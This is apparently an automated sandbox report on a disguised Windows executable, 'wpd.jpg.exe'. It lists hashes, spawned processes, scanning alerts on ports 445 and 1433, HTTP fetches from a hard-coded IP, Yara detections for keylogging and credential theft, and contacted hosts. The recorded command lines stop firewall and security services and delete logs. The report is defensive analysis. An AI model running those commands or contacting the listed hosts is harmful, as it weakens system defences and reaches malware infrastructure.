Category | Machine | Started | Completed |
---|---|---|---|
ARCHIVE | s1_win7_x6403_us | June 7, 2024, 5:50 p.m. | June 7, 2024, 5:52 p.m. |
Archive wpd.jpg.exe @ sandbox.zip
Summary
Size | 8.4MB |
---|---|
Type | PE32 executable (console) Intel 80386, for MS Windows |
MD5 | 1bfe19a314dd31d6adda302f177c3b7c |
SHA1 | 37fd59aa2c2b77c8757438075138f11eaedf81b8 |
SHA256 | b63ce450e4d34d1cdd727a1a246d38167f45aeacc69d15c6922ef723e49a3cf7 |
SHA512 |
b486b312f809146fbe95f121ea9d7bfc152266e5ca1a178316aafe4ca21e4a80ffa76b5c7e36758d45714439b34f7f6fa6d3ed2a599f64fd7dfe5a23d416a638
|
CRC32 | CD831527 |
ssdeep | 196608:1M6/uTeIz//QEJZe+t6SuqYTFLQmEe2r06+mVWFO5p5adyuFqAHBLgMP:l/YeIzAYe+t1uTJQddQ3Qub |
Yara |
|
-
-
cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im csrs.exe&sc start netprofm&sc config netprofm start= auto&sc start NlaSvc&sc config NlaSvc start= auto
2164-
taskkill.exe taskkill /f /im csrs.exe
2240 -
sc.exe sc start netprofm
2384 -
sc.exe sc config netprofm start= auto
2456 -
sc.exe sc start NlaSvc
2572 -
sc.exe sc config NlaSvc start= auto
2644
-
-
cmd.exe C:\Windows\system32\cmd.exe /c net stop WinNsaSrv&sc config WinNsaSrv start= disabled&sc1 stop sharedaccess&sc stop 1MpsSvc&sc config 1MpsSvc start= disabled&del *.log
2740 -
-
taskkill.exe taskkill /im csrs.exe /f
3552
-
-
-
csrs.exe csrs.exe -m 6 -t 200 -l 9999
3756
-
-
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.103:49758 -> 192.168.57.17:1433 | 2001583 | ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection | Misc activity |
TCP 192.168.56.103:49844 -> 192.168.57.51:1433 | 2001583 | ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection | Misc activity |
TCP 192.168.56.103:50021 -> 192.168.57.100:445 | 2001569 | ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection | Misc activity |
Suricata TLS
No Suricata TLS
section | xx0 |
section | xx1 |
section | xx2 |
resource name | BIN |
resource name | TXT |
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://104.37.187.182/xpxmr.txt | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://104.37.187.182/ok/wpd.html | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://104.37.187.182/wpdmd5.txt | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://104.37.187.182/wpdtest.txt | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://104.37.187.182/ver.txt | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://104.37.187.182/shellver.txt |
request | GET http://104.37.187.182/xpxmr.txt |
request | GET http://104.37.187.182/ok/wpd.html |
request | GET http://104.37.187.182/wpdmd5.txt |
request | GET http://104.37.187.182/wpdtest.txt |
request | GET http://104.37.187.182/ver.txt |
request | GET http://104.37.187.182/shellver.txt |
name | BIN | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e90a5c | size | 0x0001e059 | ||||||||||||||||||
name | BIN | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e90a5c | size | 0x0001e059 | ||||||||||||||||||
name | BIN | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e90a5c | size | 0x0001e059 | ||||||||||||||||||
name | BIN | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e90a5c | size | 0x0001e059 | ||||||||||||||||||
name | BIN | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e90a5c | size | 0x0001e059 | ||||||||||||||||||
name | BIN | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e90a5c | size | 0x0001e059 | ||||||||||||||||||
name | BIN | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e90a5c | size | 0x0001e059 | ||||||||||||||||||
name | BIN | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e90a5c | size | 0x0001e059 | ||||||||||||||||||
name | BIN | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e90a5c | size | 0x0001e059 | ||||||||||||||||||
name | BIN | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e90a5c | size | 0x0001e059 | ||||||||||||||||||
name | BIN | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e90a5c | size | 0x0001e059 | ||||||||||||||||||
name | BIN | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e90a5c | size | 0x0001e059 | ||||||||||||||||||
name | TXT | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00eaeab8 | size | 0x0008d49b | ||||||||||||||||||
name | RT_STRING | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00f3bf54 | size | 0x00000038 | ||||||||||||||||||
name | RT_VERSION | language | LANG_CHINESE | filetype | COM executable for DOS | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e0c350 | size | 0x000002b8 |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\python27.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\msvcp90.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\msvcr90.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\msvcm90.dll |
cmdline | C:\Windows\system32\cmd.exe /c taskkill /im csrs.exe /f |
cmdline | C:\Windows\system32\cmd.exe /c net stop WinNsaSrv&sc config WinNsaSrv start= disabled&sc1 stop sharedaccess&sc stop 1MpsSvc&sc config 1MpsSvc start= disabled&del *.log |
cmdline | C:\Windows\system32\cmd.exe /c taskkill /f /im csrs.exe&sc start netprofm&sc config netprofm start= auto&sc start NlaSvc&sc config NlaSvc start= auto |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\Crypto.Util._counter.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\Crypto.Cipher._DES3.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\_hashlib.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\cryptography.hazmat.bindings._constant_time.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\msvcr90.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\_socket.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\select.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\Crypto.Hash._MD4.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\python27.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\msvcm90.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\msvcp90.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\_ssl.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\Crypto.Cipher._DES.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\_cffi_backend.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\Crypto.Random.OSRNG.winrandom.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\pyexpat.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\Crypto.Util.strxor.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\cryptography.hazmat.bindings._openssl.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\Crypto.Cipher._AES.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\Crypto.Hash._SHA256.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\Crypto.Cipher._ARC4.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\bz2.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\_ctypes.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\unicodedata.pyd |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "csrs.exe") |
section | {u'size_of_data': u'0x0085f400', u'virtual_address': u'0x005ac000', u'entropy': 7.92303226230594, u'name': u'xx2', u'virtual_size': u'0x0085f2c0'} | entropy | 7.92303226231 | description | A section with a high entropy has been found | |||||||||
entropy | 0.99953363647 | description | Overall entropy of this PE file is high |
url | https://ssl.pstatic.net/static/pwe/common/img_use_mobile_version.png |
url | http://wwwimages.adobe.com/www.adobe.com/swf/software/flash/about/flash_about_793x170.swf |
url | https://s.pstatic.net/static/www/mobile/edit/2018/0206/cropImg_166x108_118371466370743504.jpeg |
url | https://s.pstatic.net/dthumb.phinf/?src=%22https%3A%2F%2Fs.pstatic.net%2Fstatic%2Fwww%2Fmobile%2Fedit%2F2020%2F1031%2Fupload_20063893240744871RiJjV.jpg%22 |
url | http://175.208.134.150:8282/test/test.eml |
url | https://s.pstatic.net/static/newsstand/2020/logo/light/0604/905.png |
url | https://s.pstatic.net/static/www/mobile/edit/2020/1103/mobile_142459883835.gif |
url | http://blogimgs.naver.net/nblog/guestbook/btn_close2.gif |
url | https://ssl.pstatic.net/static/nid/login/rw_captcha01.png |
url | http://www.snee.com/xml/xslt/sample.doc |
url | https://s.pstatic.net/static/newsstand/up/2017/1122/nsd113655834.png |
url | http://www.yceml.net/0559/10408495-1499411010011 |
url | https://t1.daumcdn.net/tistory_admin/blogs/plugins/tatterDesk/js/src/controls.js?_version_=9024c9023ed6ab26b00b4f2905e46ffa08aeb336 |
url | https://s.pstatic.net/static/newsstand/up/2020/0615/nsd10319824.png |
url | http://t.static.blog.naver.net/mylog/versioning/nhn.keywordHighlighter-99428789.js |
url | https://s.pstatic.net/dthumb.phinf/?src=%22http%3A%2F%2Fstatic.naver.net%2Fwww%2Fmobile%2Fedit%2F2020%2F0805%2FcropImg_339x222_38552809772500435.jpeg%22 |
url | https://ssl.pstatic.net/static/pwe/nm/b.gif |
url | https://castbox.shopping.naver.com/js/lazyload.js |
url | https://s.pstatic.net/shopping.phinf/20200729_1/2931dd60-1842-4048-a39c-1e3389db4a0e.jpg |
url | https://ssl.pstatic.net/static/pwe/nm/spr_vertical_0d25bb77f8.png |
url | https://s.pstatic.net/static/newsstand/2020/logo/light/0604/042.png |
url | https://s.pstatic.net/static/newsstand/2020/logo/light/0604/955.png |
url | https://s.pstatic.net/dthumb.phinf/?src=%22https%3A%2F%2Fs.pstatic.net%2Fstatic%2Fwww%2Fmobile%2Fedit%2F2020%2F1021%2Fupload_19201541624342101mWI1T.jpg%22 |
url | http://www.buzzadnetwork.com/jump/next.php?stamat=m%7CM-4iM-4jaQdHQBH0dEdHP3xP.0e7%2CboDB7XrVJDfRqYwVNhmAc8QRCrIuseXl_bWuTf_latOFYiGEzPpb7ikp5t8RPmTHyMRYDe1i9EJZLC6LSuccW1-YPggnMxkcwVirdNVGfgK3hFUbeKvFvqNv0-u8VxfrNUFB1gFhMN_8GLCn1znxf5_p0FJe0MYRI7nbfyajoqg_H3fvzrjsMsC0vAMYn2un8v5vcBfzwM-DewoZ7WId7geGlrySfAHx5KiJ5Hm90CU%2C |
url | https://s.pstatic.net/shopping.phinf/20200720_22/e2297359-375a-403a-86c5-44ff86c708fc.jpg |
url | https://t1.daumcdn.net/tistory_admin/blogs/plugins/PreventCopyContents/js/functions.js?_version_=9024c9023ed6ab26b00b4f2905e46ffa08aeb336 |
url | https://s.pstatic.net/shopping.phinf/20201103_21/701f9083-a72b-4ef6-ac1c-0daf1907c51d.jpg?type=f214_292 |
url | https://ssl.pstatic.net/tveta/libs/1298/1298853/743c01d46e807a376d99_20200730182507675.png |
url | https://tistory3.daumcdn.net/tistory/807805/skin/images/footerbg.jpg |
url | https://s.pstatic.net/static/newsstand/2020/logo/light/0604/820.png |
url | https://www.google.com/pagead/drt/ui |
url | https://s.pstatic.net/shopping.phinf/20201102_18/6131e135-0b61-4b61-86ca-480bf7612785.jpg |
url | https://s.pstatic.net/static/newsstand/2020/logo/light/0604/327.png |
url | http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab |
url | https://mail.naver.com/js_src/com/nhncorp/mail/write/se2_new/smart_editor2_inputarea_ie8.html?version=20190704 |
url | https://static.nid.naver.com/loginv3/img/sp_login_20150113.gif |
url | https://s.pstatic.net/static/newsstand/up/2017/0424/nsd172911723.png |
url | https://tpc.googlesyndication.com/pagead/images/abg/icon.png |
url | https://search.pstatic.net/common/?src=http%3A%2F%2Fcafefiles.naver.net%2FMjAxNzExMDdfODcg%2FMDAxNTEwMDY0OTYzNTA5.y-bJj3BgRC8r80hM6EblWFHSqawqo5-vMJAzHBN6rEkg.vAPtUzoeY8mHPRaMuejD3HrMtW5xgv-cdeEaAc0q2Rog.PNG.flashcs7%2FScreenshot_2017-11-07-22-55-08.png%23600x1024 |
url | https://s.pstatic.net/dthumb.phinf/?src=%22http%3A%2F%2Fstatic.naver.net%2Fwww%2Fmobile%2Fedit%2F2020%2F0804%2FcropImg_336x206_38466352545626545.png%22 |
url | https://www.naver.com |
url | https://t1.daumcdn.net/tistory_admin/blogs/style/menubar.css?_version_=9024c9023ed6ab26b00b4f2905e46ffa08aeb336 |
url | https://ssl.pstatic.net/static/nid/login/pc_2step_396_110.png |
url | https://tpc.googlesyndication.com/pagead/js/r20180205/r20110914/abg.js |
url | https://s.pstatic.net/static/newsstand/2020/logo/light/0604/024.png |
url | https://c.microsoft.com/ms.js |
url | https://securepubads.g.doubleclick.net/tag/js/gpt.js |
url | http://blogimgs.naver.net/nblog/skins/happybean/btn-put.gif |
url | https://s.pstatic.net/static/newsstand/2020/logo/light/0604/957.png |
url | https://my.sendinblue.com/public/theme/version4/assets/images/loader_sblue.gif |
description | Create a windows service | rule | Create_Service | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | task schedule | rule | schtasks_Zero | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Hijack network configuration | rule | Hijack_Network | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Dlls | ||||||
description | Possibly employs anti-virtualization techniques | rule | vmdetect | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Affect hook table | rule | win_hook | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Install itself for autorun at Windows startup | rule | Persistence | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Communications over P2P network | rule | Network_P2P_Win | ||||||
description | Create a windows service | rule | Create_Service | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | task schedule | rule | schtasks_Zero | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo |
cmdline | C:\Windows\system32\cmd.exe /c taskkill /im csrs.exe /f |
cmdline | sc start NlaSvc |
cmdline | taskkill /f /im csrs.exe |
cmdline | sc config NlaSvc start= auto |
cmdline | sc start netprofm |
cmdline | sc stop 1MpsSvc |
cmdline | taskkill /im csrs.exe /f |
cmdline | C:\Windows\system32\cmd.exe /c net stop WinNsaSrv&sc config WinNsaSrv start= disabled&sc1 stop sharedaccess&sc stop 1MpsSvc&sc config 1MpsSvc start= disabled&del *.log |
cmdline | sc config 1MpsSvc start= disabled |
cmdline | C:\Windows\system32\cmd.exe /c taskkill /f /im csrs.exe&sc start netprofm&sc config netprofm start= auto&sc start NlaSvc&sc config NlaSvc start= auto |
cmdline | sc config netprofm start= auto |
cmdline | sc config WinNsaSrv start= disabled |
cmdline | net stop WinNsaSrv |
host | 104.37.187.182 | |||
host | 139.5.177.32 |
description | wpd.jpg.exe tried to sleep 207 seconds, actually delayed analysis time by 207 seconds | |||
description | csrs.exe tried to sleep 1750 seconds, actually delayed analysis time by 1750 seconds |
url | http://175.208.134.150:8282/test/test.eml |
url | http://104.37.187.182/ok/wpd.html |
url | http://175.208.134.150:8282/favicon.ico |
url | http://123.123.123.123 |
url | http://192.168.3.119/ |
url | http://104.37.187.182/wpdmd5.txt |
url | http://175.208.134.150:8282/test/exe1.zip |
url | http://123.123.123.123:54321/dlr.arm |
url | https://192.168.3.119/ |
url | http://139.5.177.32:9999/ |
url | http://185.47.128.124:8124/m17010.txt |
url | http://139.5.177.32:9999 |
file | C:\Users\test22\AppData\Local\Temp\SetupExe(20200504224110B04).log |
file | C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000007.log |
file | C:\Users\test22\AppData\Local\Temp\ASPNETSetup_00003.log |
file | C:\Users\test22\AppData\Local\Temp\SetupExe(20180405152131B24).log |
file | C:\Users\test22\AppData\Local\Temp\MSIc6ae6.LOG |
file | C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000008.log |
file | C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000016.log |
file | C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000011.log |
file | C:\Users\test22\AppData\Local\Temp\UserInfoSetup(201804051522349E8).log |
file | C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000027.log |
file | C:\Users\test22\AppData\Local\Temp\java_install_reg.log |
file | C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000015.log |
file | C:\Users\test22\AppData\Local\Temp\AdobeARM.log |
file | C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000028.log |
file | C:\Users\test22\AppData\Local\Temp\SetupExe(20210707200853994).log |
file | C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000001.log |
file | C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000019.log |
file | C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000018.log |
file | C:\Users\test22\AppData\Local\Temp\ASPNETSetup_00002.log |
file | C:\Users\test22\AppData\Local\Temp\ASPNETSetup_00000.log |
file | C:\Users\test22\AppData\Local\Temp\SetupExe(2018040515215734C).log |
file | C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000003.log |
file | C:\Users\test22\AppData\Local\Temp\dd_vcredist_amd64_20180201144548_001_vcRuntimeAdditional_x64.log |
file | C:\Users\test22\AppData\Local\Temp\dd_vcredist_amd64_20180201144548_000_vcRuntimeMinimum_x64.log |
file | C:\Users\test22\AppData\Local\Temp\StructuredQuery.log |
file | C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000013.log |
file | C:\Users\test22\AppData\Local\Temp\JavaDeployReg.log |
file | C:\Users\test22\AppData\Local\Temp\SetupExe(20200504233731A78).log |
file | C:\Users\test22\AppData\Local\Temp\SetupExe(202107071812439D0).log |
file | C:\Users\test22\AppData\Local\Temp\MSIdfbe6.LOG |
file | C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000024.log |
file | C:\Users\test22\AppData\Local\Temp\MpCmdRun.log |
file | C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000014.log |
file | C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000023.log |
file | C:\Users\test22\AppData\Local\Temp\SetupExe(2020110220215923AC).log |
file | C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000005.log |
file | C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000002.log |
file | C:\Users\test22\AppData\Local\Temp\jusched.log |
file | C:\Users\test22\AppData\Local\Temp\ASPNETSetup_00001.log |
file | C:\Users\test22\AppData\Local\Temp\SetupExe(20180405152043A34).log |
file | C:\Users\test22\AppData\Local\Temp\dd_vcredist_amd64_20180201144548.log |
file | C:\Users\test22\AppData\Local\Temp\UserInfoSetup(2018040515215734C).log |
file | C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000026.log |
file | C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000006.log |
file | C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000022.log |
file | C:\Users\test22\AppData\Local\Temp\UserInfoSetup(20180405152044A34).log |
file | C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000012.log |
file | C:\Users\test22\AppData\Local\Temp\SetupExe(201804051529428CC).log |
file | C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000010.log |
file | C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000017.log |
dead_host | 139.5.177.32:9999 |
dead_host | 192.168.56.1:445 |
dead_host | 192.168.56.103:49232 |
dead_host | 192.168.56.103:49290 |
dead_host | 192.168.56.101:445 |
dead_host | 192.168.56.1:1433 |
dead_host | 192.168.56.101:1433 |
dead_host | 192.168.56.103:49432 |